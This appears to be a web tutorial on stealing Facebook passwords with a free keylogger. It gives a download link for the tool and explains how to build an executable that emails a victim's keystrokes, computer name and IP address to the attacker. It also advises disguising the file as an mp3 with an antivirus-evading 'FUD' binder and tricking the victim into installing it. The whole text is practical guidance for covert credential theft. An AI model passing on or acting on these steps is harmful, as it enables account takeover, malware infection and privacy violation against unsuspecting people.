HACK FACEBOOK ACCOUT PASSWORDS


HACK FACEBOOK ACCOUT PASSWORDS

1.First of all download free keylogger
Link:
http://www.ziddu.com/download/8786214/EasyLogger1.1.0.rar.html


2.Now extract all contents in to a folder


3.Run easylogger.exe file and you will see this:

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4..Now, fill in your Gmail username and password in respective fields. Enter the email address where you wanna receive Facebook passwords. You can set timer as you wish. This timer controls the time interval between two logs emails. Now, hit on "Build" and you will get server keylogger file named "Your logger.exe" created in current directory.


5.Now to hack a Facebook password you need to make victim install this file 
on his/her computer,you can also bind it with a mp3 file with a binder,to fool your victim.


Note: Use Binder software which is itself a FUD. If you use non-FUD Binder software, then keylogger will get detected as virus after binding. Be careful while choosing Binder


6. When server keylogger file is installed on victim computer, this keylogger will start recording the typed keystrokes on victim computer. These keystrokes will contain windows live password which we wanna hack. Keylogger will then send these recorded keystroke logs to your email address which you have entered in Step 4.

7.
Thus, you will receive emails like this:



8. What is unique in this keylogger is that this keylogger
also sends you computer name and IP addressof victim alongwith typed keystrokes. Many times, IP address is required for hacking remote computers. In such cases, Easy keylogger is very useful.


Thus, you can hack a Facebook password using this free keylogger. I have personally tested this free keylogger and found it working 100%


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